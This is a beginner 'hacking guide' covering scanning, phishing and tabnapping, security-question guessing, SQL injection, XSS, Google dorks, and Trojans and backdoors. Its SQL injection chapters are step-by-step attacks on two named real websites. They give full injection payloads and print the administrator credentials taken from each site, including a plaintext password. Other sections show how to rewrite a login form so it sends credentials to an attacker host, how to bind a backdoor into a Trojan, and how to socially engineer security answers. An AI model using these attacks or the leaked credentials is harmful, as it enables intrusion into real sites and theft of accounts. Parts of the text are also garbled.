Docstoc

Beginners Hacking Guide

Document Sample
Beginners Hacking Guide Powered By Docstoc
					Beginners Hacking Guide




            By

      J Noah Franklin




             1
1 .Introduction to Hacking
     Types of Hackers
     Type of Hacker Attack
     Malicious Hacker Strategies

2. Information Gathering

    Types of Information Gathering
    Footprinting Tools



3.Scanning
    Port Scanning
    TCP Packet Header

4 .E-Mail Hacking

    Phishing
    Tabnapping
    Guessing the Answer for the Security Question

5. SQL Injection
    Basic Commands
    Definition
    SQL injection 1 on php website
    SQL Injections 2 on aspx website

6. Cross site Scripting
    Case Study
    Fixing XSS

7 .Google Dorks
    Overview
    Google Advanced Operators




                                        2
8 .Trojans and Backdoors
      Trojans
      Backdoors
      Training
      Case study


9. Ethical Hackers salary in India

10 .Facts About Ethical Hacking Work




                                     3
Introduction to Hacking




           4
Who is Hacker:

A Person who breaks into computers and computer networks, either for profit or
motivated by challenge. In Simple Person who know the internal working of the
computer and Computer networks .



Types of Hackers :


White Hat : A white hat Hacker breaks the security for non-malicious reasons
for testing their own security . White Hat Hacker also called “Ethical Hacker”.

Gray Hat : A Grey hat hacker is a combination of a Black Hat and White Hat
Hacker .

Black Hat : A Black hat Hacker also called as “Cracker” , is who break the
security for malicious reason without authorization such as Credit card fraud and
other illegal activity.

Script Kiddie: Script(Prearranged plan ) Kiddie (kid,child lacking of knowledge)
A Script Kiddie is a non-expert who breaks into computer system by using a pre-
packaged automated tools written by others, usually with a little understanding of
the concept.



Type of Hacker Attack

Operating System attacks:
   Operating systems run many services, ports, and modes of access and
     require extensive tweaking to lock them down
   The default installation of most operating systems has large numbers of
     services running and ports open
   Attackers look for OS vulnerabilities and exploit them to gain access to a
     network system



                                         5
Application-level attacks:
   Poor or non-existent error checking in application non which leads to
     ―Buffer Overflow Attacks‖


Malicious Hacker Strategies
As there are steps to develop any software so as Every hackers do follow some
predefined rules or steps to hack into the system. They are

      Reconnaissance:- The basic information gathering about the target system.
      Scanning:- Scanning the target system for open ports and services running
       on the open ports etc.
      Gaining Access:- Gaining the actual access of the particular target system
       by exploiting the system.
      Maintaining Access:- Keeping the access of the system even after leaving
       the system so as not to perform all the steps from the scratch.
      Clearing Tracks:- To remove the footprints if any so as to remain
       undetected from the victim.




                                         6
Information Gathering




          7
Information Gathering : Is initial process as far as hacking & investigation is
concerned . It is the process of finding any organization , system , server or an
individual using methodological procedure.

Types of Information Gathering:

    Active Information Gathering
    Passive Information Gathering



Hacking tool:

    Sam Spade

   • Domain name lookup

   • Locations

Commonly includes:

    Contacts (telephone / mail)

Information Sources:

      • Open source
      • Whois
      • Nslookup


You can get all information of a company’s website since the time it was launched
at www.archive.org




                                          8
Footprinting Tools :

Some Footprinting Tools:

     Whois
     Nslookup
     ARIN
     Neo Trace
     VisualRoute Trace
     SmartWhois
     eMailTrackerPro
     Website watcher
     Google Earth
     GEO Spider
     HTTrack Web Copier




                           9
Scanning




   10
Scanning
Scanning is the process of finding out open/close ports, vulnerabilities in remote
system, server & networks. Scanning will reveal IP addresses, Operating systems,
Services running on remote computer.

There are three types of scanning.
   Port Scanning
   Network Scanning
   Vulnerability Scanning
Port Scanning:
    Port Scanning is one of the most popular technique attacker use to discover
     the service they break into.
    All machines connected to a LAN or connected to Internet via a modem run
     many services that listen at well-known and not so well-known ports.
    There are 1 to 65535 ports are available in the computer.
    By port scanning the attacker finds which ports are available .


Well Known Ports:

• echo   7/tcp Echo
• ftp-data 20/udp File Transfer [Default Data]
• ftp 21/tcp File Transfer [Control]
• ssh 22/tcp SSH Remote Login Protocol
• telnet 23/tcp Telnet
• domain 53/udp Domain Name Server
• www-http 80/tcp World Wide Web HTTP.
• Smtp 25/tcp Simple mail transfer protocol
• Whois 43/tcp whois server




                                         11
TCP Packet Header

SYN        ACK           RST      PSH         URG         FIN        TTL          WINDOW




SYN– Synchronize – it is used to initiate connection between hosts.

ACK – Acknowledgement – It is used to establish connection between hosts .
PSH – push – tells receiving system to send all buffer data.
URG – urgent – stats that data contain in packet should be process immediately.
FIN – finish – tells remote system that there will be no more transmission.
TTL – Time to Live.

Open Scan: Is also Known as TCP Scan
Autentication with 3 packets. Is known ast hree-way-handshake:

For the ports opened:

Client ----> SYN ---->
<---- SYN/ACK <---- Server
Client ----> ACK ---->

For the ports closed:

Client ----> SYN ---->
<---- RST <---- Server

Advantages : very easy to program.
Disadvantages: is very easy to detect and make logs on each connection.



                                         12
TCPConnect()

• Theconnect() system call provided by an OS is used to open a connection to
every interesting port on the machine.
• If the port is listening, connect() will succeed, otherwise the port isn't reachable.

Stealth Scan:
• A stealth scan is a kind of scan that is designed to go undetected by auditing
tools.
• Fragmented Scan: The scanner splits the TCP header into several IP fragments.
• This bypasses some packet filter firewalls because they cannot see a complete
TCP header that can match their filter rules.

SYN Scan:
• This technique is called half open scanning because a TCP connection is not
completed .

Port Scanner: NMAP

Nmap is powerful utility to scan large number of tools.
21
• Provided with GUI as well as Command line interface.
• It is supported by many operating systems.
• It can carry out SYN Scan, FIN Scan, Stealth Scan, Half open scan & many other
types.
• A SYN packet is sent to remote computer.

• The target host responds with a SYN+ACK, this indicates the port is listening
and an RST indicates a non- listener.




                                             13
FIN Scan:

• Another technique sends erroneous packets at a port, expecting that open
listening ports will send back different error messages than closed ports.
• Closed ports reply to fin packets with RST.
• Open ports ignore packets.



XMAS Scan:

• XMAS uses scans where all flags in the TCP packet are set & sent to target host.
• Closed ports reply to packets with RST.
• Open ports ignore packets.

NULL Scan:

• Null Scan used no flags of TCP header & it sent to the target host.
• Closed ports reply to packets with RST.
• Open ports ignore packets.




                                         14
E-Mail Hacking




      15
There are different types of Email Account Hacking some of them give below:
   Social Engineering
         Phishing
         Tabnapping
         Guessing the Answer for the Security Question


What is Social Engineering Attack?
A social engineering attack is one in which the intended victim is somehow tricked
into doing the attacker's bidding.
Examples: Phishing & Guessing the Answer for the Security Questions

Phishing(fake login page):

Creating a phishing page it is not a big matter. But the question how to create and
main thing we have to know the Normal Email page is working.
Normally the Email page was working by getting the username and password and
post those details to server for the verification onces both username and password
are match’s with Database We will grant access to our email.

Based on this the GET and POST are the main things which.
Open the source code of the Email but rightclick->viewpagesource
We can see the <form action =”www.realemail.com” method=”POST” >
This statement show the action was taking palce in realemail.com and the user
request to login an email was POST to the server of realemail.com


Now for a phising page we have to modify the action and method like give below
<form action=”www.myfakeemail.com” method=”GET”>
The above line shows that action was taking place In a fakeemail.com and the
method=”GET” get the details from the users and saving into database .




                                         16
TabNapping:

We all are familiar with the technique of phishing, tab-napping is the advanced
form of phishing is out in the market,
in which when u open any genuine page say the page of any legitimate website like
any shop,etc... and if you dont use that
page or in short if that page is kept idle for few seconds because of many reasons
like we start browsing other site,
attending phone calls etc, then malicious page automatically gets redirected to
phished page or duplicate page of popular sites
like gmail,orkut,facebook,yahoo,etc... which we didnt notice, coz.. we never
opened that page, so it looks kinda of genuine page.

TabNapping Working :

How this is done:
It is done by checking wether your page is idle or not, if it is idle or not used for
some particular time period then it gets redirected

Things to be done:
   check for mouse movement
   check for scroll bar movement
   check for keystrokes

If any of the above event is not triggered till few seconds , this means user is not
using that tab, either is off from system
or using other tab, so if these conditions are met, then we redirect it to our phished
page, which user thinks it to be genuine
page.



How to identify the Phishing page :

    Checks the URL properly when the time of login in an email
    Avoid clicking a links when a unkown person sent .
    Update Antivirus regularly use Anti-phishing mode.



                                           17
Guessing the Answer for the Security Question :

As a new user of email he/she is always use to follow the instruction which was
mentioned there for example.
If a user creating gmail account I used to select any one of the question below and
answer them
     What is the name if your best friend from childhood?
     what was the name for your first teacher?
     What is then name of your manager at your first job?
     What is your first phone number?
     What is your vehicle registration number?

But from the attacker point of view its simple to hack the email based on this.
Example : Victim was chatting with Attacker . Attacker wants to know about the
victims security questions and answer. He used to ask the details of the victim
what the victim automatically respond for that .

If a victim user question : What is the name if your best friend from childhood?

Answer                    : Raja

when the attacker started very friendly chat with victim he was trying to get the
answer for victim as usual victim will reply the answer for attacker

How to avoid this Guessing the Answer for the Security Question ?

Create a own question and unless or until don’t share the answer for the questions
Even more better we can use to give answer like this
    What is the name if your best friend from childhood?
      Ans:9876543210
    what was the name for your first teacher?
      Ans:gmail.com
    What is then name of your manager at your first job?
      Ans:Tamilnadu
    What is your first phone number?
      Ans:Raja
    What is your vehicle registration number?
      Ans:hackersfriendly


                                         18
SQL Injection




     19
What is SQL?

SQL (pronounced "ess-que-el") stands for Structured Query Language. SQL is
used to communicate with a database. According to ANSI (American National
Standards Institute), it is the standard language for relational database management
systems

Basic Commands :

      Select
      Insert
      Update
      Delete
      Create
      Drop


Definition: SQL injection attacks allow a malicious individual to execute arbitrary
SQL code on your server. The attack is issued by including a string delimiter (') in
an input field and following it with SQL instructions. If the server does not
properly validate input, the instructions may be executed against the database.



Code behind a username and password page :

if(username==franky) && (password==hacker)
printf("Welcome to Email ");
else
{
printf("Invalid Username or password");
}

Explanation :

This above codings meant the username and password both matches with
database then Welcome the email else the error message like Invalid username
or password
                                         20
Basics SQL injection attack code is fixed based on the general syntax of
sql commands


If the code is like give below what will happen??

if(username==a ’ or 1=1-- ) && (password==a’ or 1=1--)
printf("Welcome to Email ");
else
{
printf("Invalid Username or password");
}

Explanation:
The same login coding with sql injection attack then also email was
logged and say a welcome




                                   21
How to avoid this type of sql injection ??

    Filtering the code special character codes




SQL injection 1 on php site           :
Vulnerable link:

http://www.aeo.com.pk/indexnew.php?id=25

Step 1 : Put single quotes at the end of the number php?id=25’

http://www.aeo.com.pk/indexnew.php?id=25'

Step 2 : To find a the number of table present in the website use order by
command at the end

http://www.aeo.com.pk/indexnew.php?id=25 order by 1—

Step 3 : Increament the the table number

http://www.aeo.com.pk/indexnew.php?id=2 order by 8—

Page show error on the 8 tables so conclude that website contain only 7 tables

Step 4 : union all the table upto 7

http://www.aeo.com.pk/indexnew.php?id=25 union all select 1,2,3,4,5,6,7--

page doesn’t show a vulnerable table it seems the developer was designed the
tables in decreasing order so put minus(-) in front of 25

Step 5:

http://www.aeo.com.pk/indexnew.php?id=-25 union all select 1,2,3,4,5,6,7—

The website replies the Most vulnerable columns is 3



                                           22
Then use table_name it’s a default command to find the table_name and from
information_Shema.tables is a commands which means from the full database of
the website.



Step 6 : http://www.aeo.com.pk/indexnew.php?id=-25 union all select
1,2,group_concat(table_name),4,5,6,7 from information_schema.tables—

website having a table name is sadmin



so next column_name it’s a default command to find the column_name and from
information_Shema.columns is a commands which means from the full database
of the website.



Step 7:

http://www.aeo.com.pk/indexnew.php?id=-25 union all select
1,2,group_concat(column_name),4,5,6,7 from information_schema.columns--



Step 8 : Already v got the table name as sadmin   so

http://www.aeo.com.pk/indexnew.php?id=-25 union all select
1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where
table_name=’sadmin’—

Step 9: the above step was not working because the developer was designed table
name not a clear text and it converted in to a ascii value so my next step is
table_name=char(ascii valueofsadmin)--

http://www.aeo.com.pk/indexnew.php?id=-25 union all select
1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where
table_name=char(115,97,100,109,105,110)--

id,login,password,priority

                                        23
Step 10 : The page shows the column name also then next step palced ur column
at the first and table name at the last

http://www.aeo.com.pk/indexnew.php?id=-25 union all select 1,2,group_concat
(login,0x3a,password),4,5,6,7 from sadmin--

logi,0x3a,password , login and password column name 0x3a is ascii value for
colon

admin : 5a3e3ad9ad50ad9c0235054c0988c951

Username: admin
Password: 5a3e3ad9ad50ad9c0235054c0988c951

Password was in encrypted in md5 use www.md5decrypter.co.uk




                                      24
SQL Injections 2 on aspx website :


http://pothys.com/ImageDisplay.aspx?Id=1535&Prod=SilkCotton


Step 1:

http://pothys.com/ImageDisplay.aspx?Id=1535&Prod=SilkCotton order by 1--
The above query gives a "Page not Found" error. Hence we use the following link
for rest of the queries:


http://pothys.com/ImageDisplay.aspx?Id=1535

Step 2: Finding the column names
http://pothys.com/ImageDisplay.aspx?Id=1535 having 1=1



The selected text represents the column names.

Step 3: Finding the table names

http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1
table_name from information_schema.tables))




Here the highlighted text is the first table in the database. But we are interested in

                                           25
finding the admin table. So lets try to find the next table in the database.

So the next query is:


http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1
table_name from information_schema.tables where table_name not in
('Tab_FinalOrder')))




So the name of the admin table is "AdminMaster"

Step 4: To find the columns in "AdminMaster" table


http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1
column_name from information_schema.columns where table_name =
'AdminMaster'))


http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1
column_name from information_schema.columns where table_name =
'AdminMaster' and column_name not in ('Admin_name')))

Column names: "Admin_name" and "Admin_password"




                                           26
Step 5: Finding the username and password


http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1
Admin_name from AdminMaster))

http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1
Admin_password from AdminMaster))




                                      27
Username: admin
Password: pothys!@#


Other Tools : SQL Injector & Havij




This demo is only for the educational purpose and both the URL are dead
Already Patched.



                                    28
Cross site Scripting (XSS or CSS)




               29
Cross site scripting: Causing a user's Web browser to execute a malicious script.
There are several ways this is done. One approach is to hide code in a "click here"
hyperlink attached to a URL that points to a non-existent Web page. When the
page is not found, the script is returned with the bogus URL, and the user's browser
executes it.

http://site.com/search.php5q=<script>alert("XSS")</script>
http://site.com/search.php5q=<script>window.open( "http://www.google.com/"
)</script>

Case Study: XSS A British researcher, Jim Ley, discovered (2004) a XSS flaw
in Google and provided this proof of concept Phishing page where Google
becomes a „paying service‟. If you would be so kind as to provide your credit card
details . Now fixed.




                                         30
Fixing XSS
   • If you found XSS bugs in your scripts, its easy to secure, take a look at the
      below code.
   • if(isset($_POST['form'])){echo "<html><body>" .$_POST['form'].
      "</body></html>";}
   • Here the variable $_POST['from'] was coming from a input box, then you
      have a XSS attack.
   • The following is a very easy way to secure that.
   • $charset='UTF-8'; $data = htmlentities ($_POST['form'],
      ENT_NOQUOTES, $charset);
   • if(isset($data)){echo "<html><body>" .$data. "</body></html>";}
   • This will take all possible code and make it not executable. by turning it into
      stuff like &lt; etc...
   • $this = $_GET['id'];
   • echo "you are viewing " . $this . "blog";
   • If we include 5id=<script>alert("XSS")</script>
   • into the url its going to execute our code, a very easy way to secure this is
      using (int) check the following code
   • $this = (int)$_GET['id'];
   • echo "you are viewing " . $this . "blog";
If at anytime the variable contains anything but a Integer, it will return 0




                                          31
Google Dorks




     32
How does Google Search work ?

Google search engine is undoubtedly most widely used search engine. It was
founded by Larry Page and Sergey Brin.

Overview
Okay lets assume , you want design a little search engine that would search the
requested key words in few websites (say 5 websites) ,So what would be our
approach ? First of all, we will store the contents that is webpages of that 5
websites in our database. Then we will make an index including the important part
of these web pages like titles,headings,meta tags etc. Then we would make a
simple search box meant for users where they could enter the search query or
keyword. User's entered query will be processed to match with the keywords in the
index and the results would be returned accordingly. We will return user with list
of the links of actual websites and the preference to those websites will be given to
them using some algorithm. I hope the basic overview of working of search engine
is clear to you.


A web search engine works basically in the following manner. There
are basically three parts.
1. Web Crawling
2. Indexing
3. Query processing or searching


Google Advanced Operators

Google supports several advanced operators, which are query words that have
special meaning to Google. Typically these operators modify the search in some
way, or even tell Google to do a totally different type of search. For instance,
"link:" is a special operator, and the query [link:www.google.com] doesn't do a
normal search but instead finds all web pages that have links to www.google.com.

                                         33
Several of the more common operators use punctuation instead of words, or do not
require a colon. Among these operators are OR, "" (the quote operator), - (the
minus operator), and + (the plus operator). More information on these types of
operators is available on the Basics of Search page. Many of these special
operators are accessible from the Advanced Search page, but some are not. Below
is a list of all the special operators Google supports.

Alternate query types



cache:   If you include other words in the query, Google will highlight those
         words within the cached document. For instance,
         [cache:www.google.com web] will show the cached content with the
         word "web" highlighted.

         This functionality is also accessible by clicking on the "Cached" link on
         Google's main results page.

         The query [cache: ] will show the version of the web page that Google
         has in its cache. For instance, [cache:www.google.com] will show
         Google's cache of the Google homepage. Note there can be no space
         between the "cache:" and the web page url.
link:    The query [link: ] will list webpages that have links to the specified
         webpage. For instance, [link:www.google.com] will list webpages that
         have links pointing to the Google homepage. Note there can be no space
         between the "link:" and the web page url.

         This functionality is also accessible from the Advanced Search page,
         under Page Specific Search > Links
related: The query [related: ] will list web pages that are "similar" to a specified
         web page. For instance, [related:www.google.com] will list web pages
         that are similar to the Google homepage. Note there can be no space
         between the "related:" and the web page url.

         This functionality is also accessible by clicking on the "Similar Pages"
         link on Google's main results page, and from the Advanced Search page,
         under Page Specific Search > Similar.


                                          34
info:    The query [info: ] will present some information that Google has about
         that web page. For instance, [info:www.google.com] will show
         information about the Google homepage. Note there can be no space
         between the "info:" and the web page url.

         This functionality is also accessible by typing the web page url directly
         into a Google search box.


Other information needs



define: The query [define:] will provide a definition of the words you enter after
        it, gathered from various online sources. The definition will be for the
        entire phrase entered (i.e., it will include all the words in the exact order
        you typed them).
stocks: If you begin a query with the [stocks:] operator, Google will treat the rest
        of the query terms as stock ticker symbols, and will link to a page showing
        stock information for those symbols. For instance, [stocks: intc yhoo] will
        show information about Intel and Yahoo. (Note you must type the ticker
        symbols, not the company name.)

         This functionality is also available if you search just on the stock symbols
         (e.g. [ intc yhoo ]) and then click on the "Show stock quotes" link on the
         results page.


Query modifiers



site:      If you include [site: ] in your query, Google will restrict the results to
           those websites in the given domain. For instance, [help
           site:www.google.com] will find pages about help within
           www.google.com. [help site:com] will find pages about help within
           .com urls. Note there can be no space between the "site:" and the



                                           35
            domain.

            Advanced Search page, under Advanced Web Search > Domains.
allintitle: If you start a query with [allintitle:], Google will restrict the results to
            those with all of the query words in the title. For instance, [allintitle:
            google search] will return only documents that have both "google" and
            "search" in the title.

            Advanced Search page, under Advanced Web Search > Occurrences.
intitle:    If you include [intitle: ] in your query, Google will restrict the results to
            documents containing that word in the title. For instance, [intitle:google
            search] will return documents that mention the word "google" in their
            title, and mention the word "search" anywhere in the document (title or
            no). Note there can be no space between the "intitle:" and the following
            word.

            Putting [intitle:] in front of every word in your query is equivalent to
            putting [allintitle:] at the front of your query: [intitle:google
            intitle:search] is the same as [allintitle: google search].
allinurl:   If you start a query with [allinurl:], Google will restrict the results to
            those with all of the query words in the url. For instance, [allinurl:
            google search] will return only documents that have both "google" and
            "search" in the url.

            Note that [allinurl:] works on words, not url components. In particular, it
            ignores punctuation. Thus, [allinurl: foo/bar] will restrict the results to
            page with the words "foo" and "bar" in the url, but won't require that
            they be separated by a slash within that url, that they be adjacent, or that
            they be in that particular word order. There is currently no way to
            enforce these constraints.

            Advanced Search page, under Advanced Web Search > Occurrences.




inurl: If you include [inurl: ] in your query, Google will restrict the results to
       documents containing that word in the url. For instance, [inurl:google

                                            36
     search] will return documents that mention the word "google" in their url,
     and mention the word "search" anywhere in the document (url or no). Note
     there can be no space between the "inurl:" and the following word.

     Putting "inurl:" in front of every word in your query is equivalent to putting
     "allinurl:" at the front of your query: [inurl:google inurl:search] is the same
     as [allinurl: google search].


Download dorks
http://www.ziddu.com/download/14822372/googledork.rar.html

http://www.ziddu.com/download/14822373/googlecamerasdorks.txt.html

http://www.ziddu.com/download/14822374/GoogleDorklist.txt.html




                                        37
Trojans and Backdoors




         38
1. Introduction
In this paper we try to show what are Trojans and Backdoors and how
an attacker can use them to have access to any victim system. We also
talk about abilities which a Trojan or a backdoor gives to attacker and
how we can protect our system against these kinds of attacks. In final,
we use an open source backdoor to show how a backdoor works as a
case study.
2. Trojans
You may remember the story of old Greek. Greeks attacked to one of
the Troy's cities. After an unsuccessful attack, Greeks made a great plan
to win. They made a big horse from wood and left it in front of the
Troy's gate. The troy's civilians thought that it was a gift and brought
that horse which is called Trojan into the city. In late night, Greek
militaries came out of the horse and destroyed the whole city.
The applications works like this story and it is one of the most popular
applications which is used for attacking computers. A new game, new
free software or an electronic postal card can be a Trojan and it can
harm your data or makes a backdoor and your system. Therefore we
should be careful about what ever software, an unknown person offers
to us.
3. Backdoors
As you can guess, a backdoor is an unusual way which an attacker can
use it to get into the system. Normal users use login boxes and
password protected ways to use the system. Even system administrator
may add some security features to this system to make it more protect,
but the attacker can easily use installed backdoor to get into system
without any password or authenticating.
Most of attackers like to protect their backdoor on victim system. They
do not like that some another attacker use the same vulnerability to get
into victim system and change their configurations. That is why an
expert attacker after getting access protects vulnerability which is used
                                   39
for getting access to the system. Although the system could be in a
company and some body else use that for working, but attacker is the
owner of system and can install any application or use stored
infractions which is exists on that system.
Some times attacker makes a very secure backdoor even much safer
than normal way to get into system. A normal user may use only one
password for using the system but a backdoor may needs many
authentications or SSH layer to let attacker use the system. Usually it is
harder to get into the victim system from installed backdoor in
compare with normal logging in.
3.1. Backdoor installation methods
At the most of times, after getting the control of victim system by an
attacker, he installs a backdoor on victim system to keep his access in
future. It is as easy as running a command on victim machine. But there
are also some easier ways to install a backdoor. Most popular way is
using Trojans. With sending a greeting card or a free game a backdoor
can install on victim system and let attacker to control system.
Another way to install a backdoor is using ActiveX. Whenever a user
visit a website, embedded ActiveX could run on system. Most of
websites show a message about running ActiveX for voice chat,
downloading applications or verifying the user. But the truth is they can
easily install any thing on user machine with




                                    40
only running ActiveX for once. There are several kinds of applications
which are used to improve the abilities of websites, such as Java
applets but Java applets have a limited access to the system but with
ActiveX you can have a full control of machine which is running given
ActiveX.
Microsoft made a security policy for protecting the system against this
trick. Developers of ActiveX should sign their published ActiveX and the
signature should be valid. If any user wants to run an ActiveX without a
valid signature, the browser shows the alert about the security
problems which may happen after running ActiveX. Unfortunately most
of the users do not care to this alert and run any ActiveX which is
embedded to browsing web page. It could be very dangerous to run
any ActiveX without a valid signature from any unknown source.
4. Undetectable control
Attackers use different mechanisms to make their backdoors
undetectable and untraceable. If system administrator sees an
abnormal behavior in system, he can understand that it may because of
some virus or backdoor, therefore he will find the backdoor and
attacker can not access to the system anymore. If he can trace the
destination of packets he also can find the attacker. That is why, expert
attackers tries to hide their communication and backdoor tasks. There
are several ways to do hiding which we shortly describe some of them.
4.1. Cryptography
In many situations attackers use cryptography to encrypt transferred
data between victim system and attacker. They use different methods
of encryption to make commands and transfer data between victim
machine and attacker’s system transparent for system administrator
during monitoring the network traffics and behaviors.
In most cases, there is no need to use a very powerful encryption
technique, because attacker only use encryption algorithm for hiding
the data during transmission. If attacker uses a very powerful technique
like RSA, it may cause to increase the CPU usage of victim machine and
makes transfer time longer.
                                   41
In these cases, attackers usually use AES symmetric encryption
methods. Serpent is one of popular methods which are used by
backdoors. Although Serpent is very strong, still it can be broken with
XSL attack but it is much stronger than other AES methods and
attackers use that because they believe XSL could be an expensive
attack for breaking an effective algorithm like Serpent.
SSH or VPN is another methods which attackers use for encrypting the
traffic. Delivering packets using VPN or SSH is undetectable by firewalls
and administrators and attacker can use standard services which are
already installed on the network for encrypting the backdoor control
packets.
4.2. Root kits
Although backdoors can be very dangerous but because they run like a
normal application, they can be easily findable. Taking a look in system
task list, services or registry may show the backdoor. Expert attacker
use more powerful backdoors called Root kits. Root kits work as a part
of operating system and do not let the users to see real tasks or
services. Operating system will be under full control of attacker and he
can hide everything he wants in system. Root kits have two main
groups with different architectures, Classic Root kits and Kernel Root
Kits.




                                    42
4.2.1. Classic Root kits
Classic Root kits focused on UNIX based operating systems, like Linux
and SunOS. Usually, in these Root kits attackers replace /bin/login file
with another version which lets attacker to use his own user name and
password to get into system. In this situation, if system administrator
changes the root password or limit the access of root user to log into
system remotely, attacker can logging in with his saved password. It can
also use for saving the passwords of other users in attacker’s database.
Sometimes, Classic Root kits hide more things. For example they
change ifconfig command to hide network card flags from
administrator eyes. If they do not change the classic ifconfig file, during
sniffing of attacker, administrator can see the PROMISC flag and he can
understand that a sniffer program is running.
Other UNIX commands which usually changes by classic root kits for
hiding are: du, find, ls, netstat and ps.
4.2.2. Kernel Root kits
Kernel root kits replace themselves with the kernel of operating system.
In this case you can not trust anything in your system. Whenever an
application wants to run on system, operating system reports the
results which attacker wants. With Kernel root kits, all processes, tasks,
network configurations, port numbers, content of files and any other
things that you can believe can show themselves in another way and
attacker can force operating system to lie about what ever the user or
administrator wants to know.
With Kernel Root kits detection and tracing the backdoors is very hard
and they can even stop antivirus or system monitors. It is the most
powerful way of using backdoors.
4.3. Using different protocols and port numbers
Attacker may use a random port number instead of standard ports for
running a service and victim machine. Unexpected running of SSH
service on port 22 which is always monitored by administrator may
cause to trace the attack by system administrator. That is why most of

                                    43
attackers use another port numbers to make it harder to detect the
running service of the attacker.
Some of the backdoors works more professionally. They change port
numbers or using protocol during attack. For example a good backdoor
can change the connection protocol from TCP to UDP and even ICMP. If
system administrator blocks a port or protocol on gateway, backdoor
can switch to another protocol or port number and let attacker to
reconnect into the system.
4.4. Reverse control
Most of firewalls or administrators block some connections to outside.
They may just let local user to browse websites and not more. Even it
can be harder with a NAT system and giving private IP addresses, it is
impossible for attacker to connect to a system which is exists on a
private LAN.
Backdoors can use another strategy in these situations. Attacker runs
his own server on a specific IP address and in given time backdoor tries
to connect to the server inside the firewall and ask from attacker's
server for commands which should be run on victim machine. Backdoor
can also use standard HTTP protocol to connect to attacker server and
the server will give the command in HTTP format. It looks like a web
browsing for firewall or administrator. This strategy can also work from
behind of huge firewall system and it really hard to detect.




                                   44
The only way which may case to detect these connections is to
monitoring the number of requests which sends from a system to a
special IP address. Sometimes attackers use chaining many servers on
different IP addresses to connect randomly by victim system. This
method is even harder to protect.
4.5. Backdoor timing
There are many services which are used for updating the systems
during idle time. Cron command on UNIX machines or Schedule tasks
on windows machines are samples of these services.
Attackers can use these services to use backdoors in given times. For
example, using Cron table of an UNIX machine, a back door can start to
work in 4 O’clock of morning and let attacker to connect to system, the
time which there is no dministrator in the office.
a
5. Protecting against Trojans and Backdoors
Now, this is a time to know how we can protect our systems from
Trojans and Backdoors and how we can defend these kinds of attacks.
Several ways could be suitable for this defending. We discuss briefly
about these methods.
5.1. Antivirus
Running an update antivirus on all client systems with Real-time
protection can be a very good way against popular Backdoors and
Trojans. Antivirus can easily find Backdoors or Trojans before running
them on the system, but the important thing is to keep any antivirus
update. If an attacker use a new backdoor or Trojan which is not exists
in antivirus database, it can run on victim machine easily and without
any warning.
5.2. Signatures
Before using software you should be in sure about the application
which you want to run. Many of developers use MD5 algorithm to
make a hash string from their final application. After downloading any
application and before running you can calculate the hash string of
executable application and compare it with given hash string which is
                                   45
exists on developer’s website. If hash strings were same you can
understand nobody changes executable file and you can execute it. But
before execution you should have trust to developer.
There are many third-party companies, like verisign, which they give
some keys for signing applications to the developers. If any application
had this signature you can be in sure that the company is trusted and
application is valid and safe for execution. If you do not know all of
trusted software companies, you can trust to your trusted third-party
company which guarantees the software company.
5.3. Training
It is very important to train the users about security problems which
may happens in whole system. In most of times attackers use social
engineering to deceit users. Users have to know what they should do
and what they should not. If any user do something wrong, whole the
corporation may become reachable for an attacker.
6. Case study
In this part, we use Back Orifice 2000 as a sample to show how a
backdoor can work on a system. Back Orifice 2000 (also called Bo2k) is
one of oldest and most




                                   46
popular backdoors which is widely used for training issues on Windows
machines. Bo2k is open source and it can be reachable from Source
forge website.
6.1. Back Orifice and its history
Back Orifice is written by Dildog on of the members of ‘Cult of the dead
cow’ group. It introduced in DefCon 7 conference in 1999.
After a while they made a more powerful version of Back Orifice in the
name of Back Orifice 2000 or Bo2k as an open source project. They
called this system a remote administration system but because it can
be installed on client machine without any prompt, many of peoples
used this application for bad reasons. Tht is why when ever you want to
execute a Bo2k application on your system, your antivirus shows an
alert. Bo2k is a tool which you can use it in both good and bad tasks.
Many of companies use Bo2k as a cheap solution for managing their
systems remotely.
6.2. Abilities of BO2K
Bo2k is very small but very complete in abilities. The client code of Bo2k
is about 100 KB and it can be installed very easily even with old
modems and limited bandwidth. You can also change the size of client
with adding more features to it to have more control on remote
machine. It can use different kinds of authentication, cryptography
algorithms and protocols. In recent versions you can also run it as a
reverse client or you can add kernel root kit features to hide the tasks.
You can Improve the Bo2k abilities with adding some plug-ins to both
client and server part of this application. Even you can develop your
own plug-ins to work under Bo2k system.
Whenever you download a Bo2k application, you can use bo2kcfg (Bo2k
Configuration Application) for configuration of Bo2k client. You can
open Bo2k file and pre-configure it for using in future. In this step you
can add TCP/UDP protocols for Communication, Authentication and
Encryption mechanisms, and default port for using in future. After
configuration this client, whenever you run it on any machine, you can

                                    47
connect to that machine using bo2kgui interface to control the client
system remotely.
6.3. Making a Trojan using BO2K
You can use many binder applications to bind Bo2k client to any other
program. After running the result program, Bo2k will start to work and
user can not understand that bo2k is running in parallel. Elite Wrap,
Saran Wrap and Silk Rope are some sample programs which is widely
used for binding the Bo2k client to other applications.
7. Conclusion
This paper is written to have an overview on Trojans and Backdoors. It
is good to know how Backdoors and Trojans work and how they can
harm our systems. With studying their behaviors we can design more
secure systems and we can protect our information against these
attacks.




                                  48
ETHICAL HACKER SALARY IN INDIA:

National Salary Data (?)                     Rs 0 Rs 450K     Rs 900K
Certified Ethical Hacker(CEH)                  Rs 180,000 - Rs 400,000

Security Consultant,(Computing /
Networking / Information Technology)         Rs 353,749 - Rs 763,024
Security Engineer,Information Systems        Rs 260,000 - Rs 643,224
Security Consultant,IT                       Rs 322,692 - Rs 834,239
Penetration Tester                           Rs 122,084 - Rs 589,581




Facts About Ethical Hacking Work :

Job Title: Ethical Hacker, Penetration Tester
Office: At a computer
Description: With permission, use computer skills to penetrate
information systems to increase security, identify weaknesses and
vulnerabilities, and decrease criminal penetration
Certifications/Education: No formal education required. EC Council
Certification
Necessary Skills: Knowledge of programming, script languages, hacking
Potential Employers: Private firms, Security consultants, Banks,
Government
Pay: Average $66,000 per year, Over $100,000 with experience and
success




                                        49
References :
OWASP For a more complete set of requirements and problems to avoid in this
area, see the ASVS requirements areas for Authentication (V2) and Session
